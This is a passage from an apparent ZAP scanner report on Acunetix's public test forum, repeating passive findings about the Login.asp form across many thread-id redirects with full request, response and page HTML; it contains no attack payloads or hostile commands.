class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=52 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=53 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=54 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=55 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=56 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D56" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=57 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D57" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=58 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D58" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=59 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
